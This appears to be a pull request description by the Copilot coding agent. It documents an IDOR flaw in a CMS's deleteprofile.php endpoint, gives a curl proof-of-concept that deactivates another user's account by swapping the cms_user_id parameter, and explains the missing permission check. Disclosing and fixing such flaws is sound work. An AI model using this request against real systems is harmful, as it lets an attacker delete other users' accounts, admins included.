Provide CURL command demonstrating IDOR vulnerability in deleteprofile endpoint

[Copilot]

Responds to review feedback requesting demonstration of the IDOR (Insecure Direct Object Reference) attack in the deleteprofile.php AJAX endpoint.

Response Provided

Documented the CURL command showing how an authenticated attacker can deactivate any user account by manipulating the cms_user_id POST parameter:

curl -X POST 'http://localhost:8000/ajax.php?file=deleteprofile' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  -H 'Cookie: PHPSESSID=<attacker_session_id>' \
  -d 'cms_user_id=<victim_user_id>'

The vulnerability exists because the endpoint accepts $_POST['cms_user_id'] directly in the UPDATE query and simpleSaveChangeHistory() call without verifying the authenticated user has permission to delete that account. Any authenticated user can delete any other user (including admins) by supplying a different user ID.

Note: This PR only provides the demonstration. The security fix is tracked in the parent PR #814.

---

✨ Let Copilot coding agent set things up for you — coding agent works faster and does higher quality work when set up for your repo.